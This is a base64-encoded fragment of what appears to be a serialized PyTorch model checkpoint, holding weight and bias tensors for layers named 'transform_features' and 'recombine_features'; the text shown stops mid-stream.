+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV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